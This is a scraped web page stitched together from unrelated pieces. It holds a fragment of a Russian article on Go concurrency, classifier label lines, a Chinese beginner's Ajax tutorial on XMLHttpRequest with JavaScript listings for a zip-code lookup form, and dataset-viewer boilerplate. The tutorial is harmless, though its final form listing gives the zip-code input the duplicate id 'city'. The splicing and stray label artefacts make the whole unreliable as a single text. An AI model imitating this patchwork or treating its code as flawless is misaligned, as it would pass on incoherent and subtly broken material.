73 0x0000000000000000, 0x0000000000000000, 0x0000000000010000, 0xfffe000000000000, 0xffffffffffffffff,
74 0xffffffffffffffff, 0xffffffffffffffff, 0xfffffffeffffffff, 0xffffffffffffffff,
75};
76
77template <>
78struct RanluxppData<218> {
79 static const uint64_t kA[9];
80};
81const uint64_t RanluxppData<218>::kA[] = {
82 0xf445fffffffffd94, 0xfffffd74ffffffff, 0x000000000ba5ffff, 0xfc76000000000942, 0xfffffaaaffffffff,
83 0x0000000000b0ffff, 0x027b0000000007d1, 0xfffff96000000000, 0xfffffffff8e4ffff,
84};
85
86template <>
87struct RanluxppData<223> {
88 static const uint64_t kA[9];
89};
90// Also given by Sibidanov
91const uint64_t RanluxppData<223>::kA[] = {
92 0x0000000ba6000000, 0x0a00000000094200, 0xffeef0fffffffffa, 0xfffffffe25ffffff, 0x7b0000000007d0ff,
93 0xfff9600000000002, 0xfffffff8e4ffffff, 0xba00000000026cff, 0x00028b000000000b,
94};
95
96template <>
97struct RanluxppData<389> {
98 static const uint64_t kA[9];
99};
100// Also given by Sibidanov
101const uint64_t RanluxppData<389>::kA[] = {
102 0x00002ecac9000000, 0x740000002c389600, 0xb9c8a6ffffffe525, 0xfffff593cfffffff, 0xab0000001e93f2ff,
103 0xe4ab160000000d92, 0xffffdf6604ffffff, 0x020000000b9242ff, 0x0df0600000002ee0,
104};
105
106template <>
107struct RanluxppData<404> {
108 static const uint64_t kA[9];
109};
110const uint64_t RanluxppData<404>::kA[] = {
111 0x2eabffffffc9d08b, 0x00012612ffffff99, 0x0000007c3ebe0000, 0x353600000047bba1, 0xffd3c769ffffffd1,
112 0x0000001ada8bffff, 0x6c30000000463759, 0xffb2a1440000000a, 0xffffffc634beffff,
113};
114
115template <>
116struct RanluxppData<778> {
117 static const uint64_t kA[9];
118};
119const uint64_t RanluxppData<778>::kA[] = {
120 0x872de42d9dca512b, 0xdbf015ea1662f8a0, 0x01f48f0d28482e96, 0x392fca0b3be2ae04, 0xed00881af896ce54,
121 0x14f0a768664013f3, 0x9489f52deb1f7f80, 0x72139804e09c0f37, 0x2146b0bb92a2f9a4,
122};
123
124template <>
125struct RanluxppData<794> {
126 static const uint64_t kA[9];
127};
128const uint64_t RanluxppData<794>::kA[] = {
129 0x428df7227a2ca7c9, 0xde32225faaa74b1a, 0x4b9d965ca1ebd668, 0x78d15f59e58e2aff, 0x240fea15e99d075f,
130 0xfe0b70f2d7b7d169, 0x75a535f4c41d51fb, 0x1a5ef0b7233b93e1, 0xbc787ca783d5d5a9,
131};
132
133template <>
134struct RanluxppData<2048> {
135 static const uint64_t kA[9];
136};
137// Also given by Sibidanov
138const uint64_t RanluxppData<2048>::kA[] = {
139 0xed7faa90747aaad9, 0x4cec2c78af55c101, 0xe64dcb31c48228ec, 0x6d8a15a13bee7cb0, 0x20b2ca60cb78c509,
140 0x256c3d3c662ea36c, 0xff74e54107684ed2, 0x492edfcc0cc8e753, 0xb48c187cf5b22097,
141};
142
143} // end anonymous namespace
144
145namespace ROOT {
146namespace Math {
147
148template <int w, int p, int u>
150 // Needs direct access to private members to initialize its four states.
151 friend class RanluxppCompatEngineLuescherImpl<w, p>;
152
153private:
154 uint64_t fState[9]; ///< RANLUX state of the generator
155 unsigned fCarry; ///< Carry bit of the RANLUX state
156 int fPosition = 0; ///< Current position in bits
157
158 static constexpr const uint64_t *kA = RanluxppData<p>::kA;
159 static constexpr int kMaxPos = (u == 0) ? 9 * 64 : u * w;
160 static_assert(kMaxPos <= 576, "maximum position larger than 576 bits");
161
162 /// Advance with given multiplier
163 void Advance(const uint64_t *a)
164 {
165 uint64_t lcg[9];
166 to_lcg(fState, fCarry, lcg);
167 mulmod(a, lcg);
168 to_ranlux(lcg, fState, fCarry);
169 fPosition = 0;
170 }
171
172 /// Produce next block of random bits
173 void Advance()
174 {
175 Advance(kA);
176 }
177
178 /// Skip 24 RANLUX numbers
179 void Skip24()
180 {
181 Advance(RanluxppData<24>::kA);
182 }
183
184public:
185 /// Return the next random bits, generate a new block if necessary
186 uint64_t NextRandomBits()
187 {
188 if (fPosition + w > kMaxPos) {
189 Advance();
190 }
191
192 int idx = fPosition / 64;
193 int offset = fPosition % 64;
194 int numBits = 64 - offset;
195
196 uint64_t bits = fState[idx] >> offset;
197 if (numBits < w) {
198 bits |= fState[idx + 1] << numBits;
199 }
200 bits &= ((uint64_t(1) << w) - 1);
201
202 fPosition += w;
203 assert(fPosition <= kMaxPos && "position out of range!");
204
205 return bits;
206 }
207
208 /// Return a floating point number, converted from the next random bits.
210 {
211 static constexpr double div = 1.0 / (uint64_t(1) << w);
212 uint64_t bits = NextRandomBits();
213 return bits * div;
214 }
215
216 /// Initialize and seed the state of the generator as in James' implementation
217 void SetSeedJames(uint64_t s)
218 {
219 // Multiplicative Congruential generator using formula constants of L'Ecuyer
220 // as described in "A review of pseudorandom number generators" (Fred James)
221 // published in Computer Physics Communications 60 (1990) pages 329-344.
222 int64_t seed = s;
223 auto next = [&]() {
224 const int a = 0xd1a4, b = 0x9c4e, c = 0x2fb3, d = 0x7fffffab;
225 int64_t k = seed / a;
226 seed = b * (seed - k * a) - k * c ;
227 if (seed < 0) seed += d;
228 return seed & 0xffffff;
229 };
230
231 // Iteration is reversed because the first number from the MCG goes to the
232 // highest position.
233 for (int i = 6; i >= 0; i -= 3) {
234 uint64_t r[8];
235 for (int j = 0; j < 8; j++) {
236 r[j] = next();
237 }
238
239 fState[i+0] = r[7] + (r[6] << 24) + (r[5] << 48);
240 fState[i+1] = (r[5] >> 16) + (r[4] << 8) + (r[3] << 32) + (r[2] << 56);
241 fState[i+2] = (r[2] >> 8) + (r[1] << 16) + (r[0] << 40);
242 }
243 fCarry = !seed;
244
245 Skip24();
246 }
247
248 /// Initialize and seed the state of the generator as in gsl_rng_ranlx*
249 void SetSeedGsl(uint32_t s, bool ranlxd)
250 {
251 if (s == 0) {
252 // The default seed for gsl_rng_ranlx* is 1.
253 s = 1;
254 }
255
256 uint32_t bits = s;
257 auto next_bit = [&]() {
258 int b13 = (bits >> 18) & 0x1;
259 int b31 = bits & 0x1;
260 uint32_t bn = b13 ^ b31;
261 bits = (bn << 30) + (bits >> 1);
262 return b31;
263 };
264 auto next = [&]() {
265 uint64_t ix = 0;
266 for (int i = 0; i < 48; i++) {
267 int iy = next_bit();
268 if (ranlxd) {
269 iy = (iy + 1) % 2;
270 }
271 ix = 2 * ix + iy;
272 }
273 return ix;
274 };
275
276 for (int i = 0; i < 9; i += 3) {
277 uint64_t r[4];
278 for (int j = 0; j < 4; j++) {
279 r[j] = next();
280 }
281
282 fState[i+0] = r[0] + (r[1] << 48);
283 fState[i+1] = (r[1] >> 16) + (r[2] << 32);
284 fState[i+2] = (r[2] >> 32) + (r[3] << 16);
285 }
286
287 fCarry = 0;
288 fPosition = 0;
289 Advance();
290 }
291
292 /// Initialize and seed the state of the generator as proposed by Sibidanov
293 void SetSeedSibidanov(uint64_t s)
294 {
295 uint64_t lcg[9];
296 lcg[0] = 1;
297 for (int i = 1; i < 9; i++) {
298 lcg[i] = 0;
299 }
300
301 uint64_t a_seed[9];
302 // Skip 2 ** 96 states.
303 powermod(kA, a_seed, uint64_t(1) << 48);
304 powermod(a_seed, a_seed, uint64_t(1) << 48);
305 // Skip another s states.
306 powermod(a_seed, a_seed, s);
307 mulmod(a_seed, lcg);
308
309 to_ranlux(lcg, fState, fCarry);
310 fPosition = 0;
311 }
312
313 /// Initialize and seed the state of the generator as described by the C++ standard
314 void SetSeedStd24(uint64_t s)
315 {
316 // Seed LCG with given parameters.
317 uint64_t seed = s;
318 const uint64_t a = 40014, m = 2147483563;
319 auto next = [&]() {
320 seed = (a * seed) % m;
321 return seed & 0xffffff;
322 };
323
324 for (int i = 0; i < 9; i += 3) {
325 uint64_t r[8];
326 for (int j = 0; j < 8; j++) {
327 r[j] = next();
328 }
329
330 fState[i+0] = r[0] + (r[1] << 24) + (r[2] << 48);
331 fState[i+1] = (r[2] >> 16) + (r[3] << 8) + (r[4] << 32) + (r[5] << 56);
332 fState[i+2] = (r[5] >> 8) + (r[6] << 16) + (r[7] << 40);
333 }
334 fCarry = !seed;
335
336 Skip24();
337 }
338
339 /// Initialize and seed the state of the generator as described by the C++ standard
340 void SetSeedStd48(uint64_t s)
341 {
342 // Seed LCG with given parameters.
343 uint64_t seed = s;
344 const uint64_t a = 40014, m = 2147483563;
345 auto next = [&]() {
346 seed = (a * seed) % m;
347 uint64_t result = seed;
348 seed = (a * seed) % m;
349 result += seed << 32;
350 return result & 0xffffffffffff;
351 };
352
353 for (int i = 0; i < 9; i += 3) {
354 uint64_t r[4];
355 for (int j = 0; j < 4; j++) {
356 r[j] = next();
357 }
358
359 fState[i+0] = r[0] + (r[1] << 48);
360 fState[i+1] = (r[1] >> 16) + (r[2] << 32);
361 fState[i+2] = (r[2] >> 32) + (r[3] << 16);
362 }
363 fCarry = !seed;
364
365 Skip24();
366 }
367
368 /// Skip `n` random numbers without generating them
369 void Skip(uint64_t n)
370 {
371 int left = (kMaxPos - fPosition) / w;
372 assert(left >= 0 && "position was out of range!");
373 if (n < (uint64_t)left) {
374 // Just skip the next few entries in the currently available bits.
375 fPosition += n * w;
376 assert(fPosition <= kMaxPos && "position out of range!");
377 return;
378 }
379
380 n -= left;
381 // Need to advance and possibly skip over blocks.
382 int nPerState = kMaxPos / w;
383 int skip = (n / nPerState);
384
385 uint64_t a_skip[9];
386 powermod(kA, a_skip, skip + 1);
387
388 uint64_t lcg[9];
389 to_lcg(fState, fCarry, lcg);
390 mulmod(a_skip, lcg);
391 to_ranlux(lcg, fState, fCarry);
392
393 // Potentially skip numbers in the freshly generated block.
394 int remaining = n - skip * nPerState;
395 assert(remaining >= 0 && "should not end up at a negative position!");
396 fPosition = remaining * w;
397 assert(fPosition <= kMaxPos && "position out of range!");
398 }
399};
400
401template <int p>
403{
404 this->SetSeed(seed);
405}
406
407template <int p>
409
410template <int p>
412{
413 return (*this)();
414}
415
416template <int p>
418{
419 return fImpl->NextRandomFloat();
420}
421
422template <int p>
424{
425 return fImpl->NextRandomBits();
426}
427
428template <int p>
429void RanluxppEngine<p>::SetSeed(uint64_t seed)
430{
431 fImpl->SetSeedSibidanov(seed);
432}
433
434template <int p>
436{
437 fImpl->Skip(n);
438}
439
440template class RanluxppEngine<24>;
441template class RanluxppEngine<2048>;
442
443
444template <int p>
446{
447 this->SetSeed(seed);
448}
449
450template <int p>
452
453template <int p>
455{
456 return (*this)();
457}
458
459template <int p>
461{
462 return fImpl->NextRandomFloat();
463}
464
465template <int p>
467{
468 return fImpl->NextRandomBits();
469}
470
471template <int p>
473{
474 fImpl->SetSeedJames(seed);
475}
476
477template <int p>
479{
480 fImpl->Skip(n);
481}
482
483template class RanluxppCompatEngineJames<223>;
484template class RanluxppCompatEngineJames<389>;
485
486
487template <int p>
489{
490 this->SetSeed(seed);
491}
492
493template <int p>
495
496template <int p>
498{
499 return (*this)();
500}
501
502template <int p>
504{
505 return fImpl->NextRandomFloat();
506}
507
508template <int p>
510{
511 return fImpl->NextRandomBits();
512}
513
514template <int p>
516{
517 fImpl->SetSeedGsl(seed, /*ranlxd=*/false);
518}
519
520template <int p>
522{
523 fImpl->Skip(n);
524}
525
529
530
531template <int p>
533{
534 this->SetSeed(seed);
535}
536
537template <int p>
539
540template <int p>
542{
543 return (*this)();
544}
545
546template <int p>
548{
549 return fImpl->NextRandomFloat();
550}
551
552template <int p>
554{
555 return fImpl->NextRandomBits();
556}
557
558template <int p>
560{
561 fImpl->SetSeedGsl(seed, /*ranlxd=*/true);
562}
563
564template <int p>
566{
567 fImpl->Skip(n);
568}
569
572
573
574template <int w, int p>
576
577private:
578 RanluxppEngineImpl<w, p> fStates[4]; ///< The states of this generator
579 int fNextState = 0; ///< The index of the next state
580
581public:
582 /// Return the next random bits, generate a new block if necessary
583 uint64_t NextRandomBits()
584 {
585 uint64_t bits = fStates[fNextState].NextRandomBits();
586 fNextState = (fNextState + 1) % 4;
587 return bits;
588 }
589
590 /// Return a floating point number, converted from the next random bits.
592 {
593 double number = fStates[fNextState].NextRandomFloat();
594 fNextState = (fNextState + 1) % 4;
595 return number;
596 }
597
598 /// Initialize and seed the state of the generator as in Lüscher's ranlxs
599 void SetSeed(uint32_t s, bool ranlxd)
600 {
601 uint32_t bits = s;
602 auto next_bit = [&]() {
603 int b13 = (bits >> 18) & 0x1;
604 int b31 = bits & 0x1;
605 uint32_t bn = b13 ^ b31;
606 bits = (bn << 30) + (bits >> 1);
607 return b31;
608 };
609 auto next = [&]() {
610 uint64_t ix = 0;
611 for (int l = 0; l < 24; l++) {
612 ix = 2 * ix + next_bit();
613 }
614 return ix;
615 };
616
617 for (int i = 0; i < 4; i++) {
618 auto &state = fStates[i];
619 for (int j = 0; j < 9; j += 3) {
620 uint64_t r[8];
621 for (int m = 0; m < 8; m++) {
622 uint64_t ix = next();
623 // Lüscher's implementation uses k = (j / 3) * 8 + m, so only
624 // the value of m is important for (k % 4).
625 if ((!ranlxd && (m % 4) == i) || (ranlxd && (m % 4) != i)) {
626 ix = 16777215 - ix;
627 }
628 r[m] = ix;
629 }
630
631 state.fState[j+0] = r[0] + (r[1] << 24) + (r[2] << 48);
632 state.fState[j+1] = (r[2] >> 16) + (r[3] << 8) + (r[4] << 32) + (r[5] << 56);
633 state.fState[j+2] = (r[5] >> 8) + (r[6] << 16) + (r[7] << 40);
634 }
635
636 state.fCarry = 0;
637 state.fPosition = 0;
638 state.Advance();
639 }
640
641 fNextState = 0;
642 }
643
644 /// Skip `n` random numbers without generating them
645 void Skip(uint64_t n)
646 {
647 uint64_t nPerState = n / 4;
648 int remainder = n % 4;
649 for (int i = 0; i < 4; i++) {
650 int idx = (fNextState + i) % 4;
651 uint64_t nForThisState = nPerState;
652 if (i < remainder) {
653 nForThisState++;
654 }
655 fStates[idx].Skip(nForThisState);
656 }
657 // Switch the next state according to the remainder.
658 fNextState = (fNextState + remainder) % 4;
659 }
660};
661
662template <int p>
664{
665 this->SetSeed(seed);
666}
667
668template <int p>
670
671template <int p>
673{
674 return (*this)();
675}
676
677template <int p>
679{
680 return fImpl->NextRandomFloat();
681}
682
683template <int p>
685{
686 return fImpl->NextRandomBits();
687}
688
689template <int p>
691{
692 fImpl->SetSeed(seed, /*ranlxd=*/false);
693}
694
695template <int p>
697{
698 fImpl->Skip(n);
699}
700
704
705
706template <int p>
708{
709 this->SetSeed(seed);
710}
711
712template <int p>
714
715template <int p>
717{
718 return (*this)();
719}
720
721template <int p>
723{
724 return fImpl->NextRandomFloat();
725}
726
727template <int p>
729{
730 return fImpl->NextRandomBits();
731}
732
733template <int p>
735{
736 fImpl->SetSeed(seed, /*ranlxd=*/true);
737}
738
739template <int p>
741{
742 fImpl->Skip(n);
743}
744
747
748
750{
751 this->SetSeed(seed);
752}
753
755
757{
758 return (*this)();
759}
760
762{
763 return fImpl->NextRandomFloat();
764}
765
767{
768 return fImpl->NextRandomBits();
769}
770
772{
773 fImpl->SetSeedStd24(seed);
774}
775
777{
778 fImpl->Skip(n);
779}
780
781
783{
784 this->SetSeed(seed);
785}
786
788
790{
791 return (*this)();
792}
793
795{
796 return fImpl->NextRandomFloat();
797}
798
800{
801 return fImpl->NextRandomBits();
802}
803
805{
806 fImpl->SetSeedStd48(seed);
807}
808
810{
811 fImpl->Skip(n);
812}
813
814} // end namespace Math
815} // end namespace ROOT
#define d(i)
Definition: RSha256.hxx:102
#define c(i)
Definition: RSha256.hxx:101
winID h TVirtualViewer3D TVirtualGLPainter p
Option_t Option_t TPoint TPoint const char GetTextMagnitude GetFillStyle GetLineColor GetLineWidth GetMarkerStyle GetTextAlign GetTextColor GetTextSize void char Point_t Rectangle_t WindowAttributes_t Float_t Float_t Float_t Int_t Int_t UInt_t UInt_t Rectangle_t Int_t Int_t Window_t TString Int_t GCValues_t GetPrimarySelectionOwner GetDisplay GetScreen GetColormap GetNativeEvent const char const char dpyName wid window const char font_name cursor keysym reg const char only_if_exist regb h Point_t winding char text const char depth char const char Int_t count const char ColorStruct_t color const char Pixmap_t Pixmap_t PictureAttributes_t attr const char char ret_data h unsigned char height h offset
Option_t Option_t TPoint TPoint const char GetTextMagnitude GetFillStyle GetLineColor GetLineWidth GetMarkerStyle GetTextAlign GetTextColor GetTextSize void char Point_t Rectangle_t WindowAttributes_t Float_t Float_t Float_t b
Option_t Option_t TPoint TPoint const char GetTextMagnitude GetFillStyle GetLineColor GetLineWidth GetMarkerStyle GetTextAlign GetTextColor GetTextSize void char Point_t Rectangle_t WindowAttributes_t Float_t r
Option_t Option_t TPoint TPoint const char GetTextMagnitude GetFillStyle GetLineColor GetLineWidth GetMarkerStyle GetTextAlign GetTextColor GetTextSize void char Point_t Rectangle_t WindowAttributes_t Float_t Float_t Float_t Int_t Int_t UInt_t UInt_t Rectangle_t result
Compatibility engine for gsl_rng_ranlxd* from the GNU Scientific Library.
uint64_t IntRndm()
Generate a random integer value with 48 bits.
void SetSeed(uint64_t seed)
Initialize and seed the state of the generator.
void Skip(uint64_t n)
Skip n random numbers without generating them.
double Rndm() override
Generate a floating point random number with 48 bits of randomness.
double operator()()
Generate a floating point random number (non-virtual method)
Compatibility engine for gsl_rng_ranlxs* from the GNU Scientific Library.
double operator()()
Generate a floating point random number (non-virtual method)
double Rndm() override
Generate a floating point random number with 24 bits of randomness.
void Skip(uint64_t n)
Skip n random numbers without generating them.
uint64_t IntRndm()
Generate a random integer value with 24 bits.
void SetSeed(uint64_t seed)
Initialize and seed the state of the generator.
double operator()()
Generate a floating point random number (non-virtual method)
void Skip(uint64_t n)
Skip n random numbers without generating them.
void SetSeed(uint64_t seed)
Initialize and seed the state of the generator.
double Rndm() override
Generate a floating point random number with 24 bits of randomness.
uint64_t IntRndm()
Generate a random integer value with 24 bits.
RanluxppCompatEngineJames(uint64_t seed=314159265)
double NextRandomFloat()
Return a floating point number, converted from the next random bits.
uint64_t NextRandomBits()
Return the next random bits, generate a new block if necessary.
void SetSeed(uint32_t s, bool ranlxd)
Initialize and seed the state of the generator as in Lüscher's ranlxs.
void Skip(uint64_t n)
Skip n random numbers without generating them.
Compatibility engine for Lüscher's ranlxd implementation written in C.
uint64_t IntRndm()
Generate a random integer value with 48 bits.
void SetSeed(uint64_t seed)
Initialize and seed the state of the generator.
void Skip(uint64_t n)
Skip n random numbers without generating them.
double Rndm() override
Generate a floating point random number with 48 bits of randomness.
double operator()()
Generate a floating point random number (non-virtual method)
Compatibility engine for Lüscher's ranlxs implementation written in C.
double operator()()
Generate a floating point random number (non-virtual method)
double Rndm() override
Generate a floating point random number with 24 bits of randomness.
void SetSeed(uint64_t seed)
Initialize and seed the state of the generator.
void Skip(uint64_t n)
Skip n random numbers without generating them.
uint64_t IntRndm()
Generate a random integer value with 24 bits.
void Skip(uint64_t n)
Skip n random numbers without generating them.
uint64_t IntRndm()
Generate a random integer value with 24 bits.
double Rndm() override
Generate a floating point random number with 24 bits of randomness.
void SetSeed(uint64_t seed)
Initialize and seed the state of the generator.
double operator()()
Generate a floating point random number (non-virtual method)
void SetSeed(uint64_t seed)
Initialize and seed the state of the generator.
double operator()()
Generate a floating point random number (non-virtual method)
void Skip(uint64_t n)
Skip n random numbers without generating them.
uint64_t IntRndm()
Generate a random integer value with 48 bits.
double Rndm() override
Generate a floating point random number with 48 bits of randomness.
void SetSeedGsl(uint32_t s, bool ranlxd)
Initialize and seed the state of the generator as in gsl_rng_ranlx*.
static constexpr const uint64_t * kA
unsigned fCarry
Carry bit of the RANLUX state.
void SetSeedStd24(uint64_t s)
Initialize and seed the state of the generator as described by the C++ standard.
void SetSeedJames(uint64_t s)
Initialize and seed the state of the generator as in James' implementation.
void Skip(uint64_t n)
Skip n random numbers without generating them.
void SetSeedStd48(uint64_t s)
Initialize and seed the state of the generator as described by the C++ standard.
double NextRandomFloat()
Return a floating point number, converted from the next random bits.
void Advance(const uint64_t *a)
Advance with given multiplier.
void SetSeedSibidanov(uint64_t s)
Initialize and seed the state of the generator as proposed by Sibidanov.
uint64_t NextRandomBits()
Return the next random bits, generate a new block if necessary.
uint64_t fState[9]
RANLUX state of the generator.
int fPosition
Current position in bits.
void Skip24()
Skip 24 RANLUX numbers.
void Advance()
Produce next block of random bits.
Implementation of the RANLUX++ generator.
uint64_t IntRndm()
Generate a random integer value with 48 bits.
double Rndm() override
Generate a double-precision random number with 48 bits of randomness.
void Skip(uint64_t n)
Skip n random numbers without generating them.
void SetSeed(uint64_t seed)
Initialize and seed the state of the generator.
double operator()()
Generate a double-precision random number (non-virtual method)
RanluxppEngine(uint64_t seed=314159265)
RVec< PromoteTypes< T0, T1 > > remainder(const T0 &x, const RVec< T1 > &v)
Definition: RVec.hxx:1759
const Int_t n
Definition: legend1.C:16
static void mulmod(const uint64_t *in1, uint64_t *inout)
Combine multiply9x9 and mod_m with internal temporary storage.
Definition: mulmod.h:215
static void powermod(const uint64_t *base, uint64_t *res, uint64_t n)
Compute base to the n modulo m.
Definition: mulmod.h:229
Namespace for new Math classes and functions.
This file contains a specialised ROOT message handler to test for diagnostic in unit tests.
static constexpr double s
static void to_lcg(const uint64_t *ranlux, unsigned c, uint64_t *lcg)
Convert RANLUX numbers to an LCG state.
Definition: ranlux_lcg.h:26
static void to_ranlux(const uint64_t *lcg, uint64_t *ranlux, unsigned &c_out)
Convert an LCG state to RANLUX numbers.
Definition: ranlux_lcg.h:58
TMarker m
Definition: textangle.C:8
TLine l
Definition: textangle.C:4
TArc a
Definition: textangle.C:12
|
__label__pos
| 0.967497 |
Permalink
Browse files
Changed how 'default' works, and root tag processed too.
* My original method of 'default' was lame and totally broken.
The new version actually works properly.
* Due to changes above, there's also a new array called @.elements, of which
the first item is always the element currently being processed.
* Prior to this release, the root tag of the document was not processed
for TAL attributes. Now it is. May not be common, but useful nonetheless.
* Oh, and re-organized the tests yet again. Now they are grouped into
categories, each category starting with a certain number.
• Loading branch information...
1 parent 6da6654 commit 60a74e51d305335f970f5352a4b630bf82e89802 @supernovus committed Oct 9, 2010
View
@@ -27,6 +27,10 @@ has %!modifiers;
## Data, is used to store the replacement data. Is available for modifiers.
has %.data is rw;
+## Default stores the elements in order of parsing.
+## Used to get the 'default' value, and other such stuff.
+has @.elements;
+
## Internal class, used for the 'repeat' object.
class Flower::Repeat {
has $.index;
@@ -116,7 +120,7 @@ method parse (*%data) {
}
## Okay, now let's parse the elements.
- self!parse-elements($.template.root);
+ self!parse-element($.template.root);
return ~$.template;
}
@@ -133,8 +137,9 @@ method !parse-elements ($xml is rw) {
if $i == $xml.nodes.elems { last; }
my $element = $xml.nodes[$i];
if $element !~~ Exemel::Element { next; } # skip non-elements.
- %.data<default> = $element.nodes; # the 'default' keyword.
+ @.elements.unshift: $element; ## Stuff the newest element into place.
self!parse-element($element);
+ @.elements.shift; ## and remove it again.
## Now we clean up removed elements, and insert replacements.
if ! defined $element {
$xml.nodes.splice($i--, 1);
@@ -195,10 +200,13 @@ method !parse-condition ($xml is rw, $tag) {
}
method !parse-content ($xml is rw, $tag) {
- $xml.nodes.splice;
my $node = self.query($xml.attribs{$tag}, :forcexml);
if defined $node {
- $xml.nodes.push: $node;
+ if $node === $xml.nodes {} # special case for 'default'.
+ else {
+ $xml.nodes.splice;
+ $xml.nodes.push: $node;
+ }
}
$xml.unset: $tag;
}
@@ -275,6 +283,10 @@ method query ($query is copy, :$noxml, :$forcexml, :$bool, :$noescape is copy) {
if ($bool) { return False; }
else { return ''; }
}
+ if $query eq 'default' {
+ my $default = @.elements[0].nodes;
+ return $default;
+ }
if $query ~~ /^ structure \s+ / {
$query.=subst(/^ structure \s+ /, '');
$noescape = True;
View
@@ -0,0 +1,26 @@
+#!/usr/bin/env perl6
+
+BEGIN { @*INC.unshift: './lib' }
+
+use Test;
+use Flower;
+
+plan 2;
+
+my $xml = '<?xml version="1.0"?>';
+
+## test 1
+
+my $template = '<test><i tal:content="default">The default text</i></test>';
+my $flower = Flower.new(:template($template));
+
+is $flower.parse(), $xml~'<test><i>The default text</i></test>', 'tal:content with default';
+
+## test 2
+
+$template = '<test><i tal:replace="default">The default text</i></test>';
+$flower.=another(:template($template));
+
+is $flower.parse(), $xml~'<test>The default text</test>', 'tal:replace with default';
+
+
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
0 comments on commit 60a74e5
Please sign in to comment.
|
__label__pos
| 0.875566 |
Location: PHPKode > projects > Php4dvd - movie database > php4dvd/lib/db/Compat/Function/get_headers.php
<?php
// +----------------------------------------------------------------------+
// | PHP Version 4 |
// +----------------------------------------------------------------------+
// | Copyright (c) 1997-2004 The PHP Group |
// +----------------------------------------------------------------------+
// | This source file is subject to version 3.0 of the PHP license, |
// | that is bundled with this package in the file LICENSE, and is |
// | available at through the world-wide-web at |
// | http://www.php.net/license/3_0.txt. |
// | If you did not receive a copy of the PHP license and are unable to |
// | obtain it through the world-wide-web, please send a note to |
// | [email protected] so we can mail you a copy immediately. |
// +----------------------------------------------------------------------+
// | Authors: Aidan Lister <[email protected]> |
// +----------------------------------------------------------------------+
//
// $Id: get_headers.php,v 1.1 2005/05/10 07:50:53 aidan Exp $
/**
* Replace get_headers()
*
* @category PHP
* @package PHP_Compat
* @link http://php.net/function.get_headers
* @author Aeontech <[email protected]>
* @author Cpurruc <[email protected]>
* @author Aidan Lister <[email protected]>
* @version $Revision: 1.1 $
* @since PHP 5.0.0
* @require PHP 4.0.0 (user_error)
*/
if (!function_exists('get_headers')) {
function get_headers($url, $format = 0)
{
// Init
$urlinfo = parse_url($url);
$port = isset($urlinfo['port']) ? $urlinfo['port'] : 80;
// Connect
$fp = fsockopen($urlinfo['host'], $port, $errno, $errstr, 30);
if ($fp === false) {
return false;
}
// Send request
$head = 'HEAD ' . $urlinfo['path'] .
(isset($urlinfo['query']) ? '?' . $urlinfo['query'] : '') .
' HTTP/1.0' . "\r\n" .
'Host: ' . $urlinfo['host'] . "\r\n\r\n";
fputs($fp, $head);
// Read
while (!feof($fp)) {
if ($header = trim(fgets($fp, 1024))) {
list($key) = explode(':', $header);
if ($format === 1) {
// First element is the HTTP header type, such as HTTP 200 OK
// It doesn't have a separate name, so check for it
if ($key == $header) {
$headers[] = $header;
} else {
$headers[$key] = substr($header, strlen($key)+2);
}
} else {
$headers[] = $header;
}
}
}
return $headers;
}
}
?>
Return current item: Php4dvd - movie database
|
__label__pos
| 0.665372 |
Safe, Efficient, and Portable Rotate in C/C++
Rotating a computer integer is just like shifting, except that when a bit falls off one end of the register, it is used to fill the vacated bit position at the other end. Rotate is used in encryption and decryption, so we want it to be fast. The obvious C/C++ code for left rotate is:
uint32_t rotl32a (uint32_t x, uint32_t n)
{
return (x<<n) | (x>>(32-n));
}
Modern compilers will recognize this code and emit a rotate instruction, if available:
rotl32a:
movb %sil, %cl
roll %cl, %edi
movl %edi, %eax
ret
The source and assembly code for right rotate are analogous.
Although this x86-64 rotate instruction will have the expected behavior (acting as a nop) when asked to rotate by 0 or 32 places, this C/C++ function must only be called with n in the range 1-31. Outside of that range, the code has undefined behavior due to shifting a 32-bit value by 32 places. In general, crypto codes are designed to avoid rotating 32-bit words by 32 places. However, as seen in my last post, the current versions of five of the 10 open source crypto libraries that I examined perform rotations by 0 places — a potentially serious bug because C/C++ compilers have unpredictable results when shifting past bitwidth. Bear in mind that the well-definedness of the eventual instruction does not rescue the situation: it is the source code that places (or in this case, fails to place) obligations upon the compiler.
Here’s a safer rotate function:
uint32_t rotl32b (uint32_t x, uint32_t n)
{
assert (n<32);
if (!n) return x;
return (x<<n) | (x>>(32-n));
}
This one protects against the expected case where n is zero by avoiding the erroneous shift and also against the disallowed case of rotating by too many places. If we don’t want the overhead of the assert for production compiles, we can define NDEBUG in the preprocessor. The problem with this code is that (even with the assert compiled out) it contains a branch, which is sort of ugly. Clang generates the obvious branching code whereas GCC chooses to use a conditional move:
rotl32b:
movl %edi, %eax
movb %sil, %cl
roll %cl, %eax
testl %esi, %esi
cmove %edi, %eax
ret
I figured that was the end of the story but then I saw this version:
uint32_t rotl32c (uint32_t x, uint32_t n)
{
assert (n<32);
return (x<<n) | (x>>(-n&31));
}
This one is branchless, meaning that it results in a single basic block of code, potentially making it easier to optimize. At the moment it defeats Clang’s rotate recognizer:
rotl32c:
movl %esi, %ecx
movl %edi, %eax
shll %cl, %eax
negl %ecx
shrl %cl, %edi
orl %eax, %edi
movl %edi, %eax
ret
However, they are working on this.
GCC (built today) has the desired output:
rotl32c:
movl %edi, %eax
movb %sil, %cl
roll %cl, %eax
ret
Here is their discussion of that issue.
Summary: If you want to write portable C/C++ code (that is, you don’t want to use intrinsics or inline assembly) and you want to correctly deal with rotating by zero places, the rotl32c() function from this post, and its obvious right-rotate counterpart, are probably the best choices. GCC already generates excellent code and the LLVM people are working on it.
28 replies on “Safe, Efficient, and Portable Rotate in C/C++”
1. bcs, this one (let’s call it rotl32d) may be the new winner. gcc gives the same code as rotl32c, clang gives better code than rotl32c, and IMO it’s clearer than rotl32c.
2. Can I just say this situation is crazy? You have a simple, common programming task. In order to implement it in C, you have to write some unreadable bit-masking code. This code is not designed to be executed as such, but only be recognized as rotate by the compiler.
3. Hi David, I certainly see your point of view, and agree that the rules in C/C++ are heavily biased towards making the compiler’s job easier, as opposed to the programmer’s, but I might phrase it a bit differently.
How about this: The code is designed to unambiguously express the rotate function in the context of the somewhat arcane restrictions imposed by C/C++. Furthermore, it has the purpose of being recognizably a rotate that can be exploited by the compiler to generate an appropriate instruction should it be available (and certainly it will not be on some platforms).
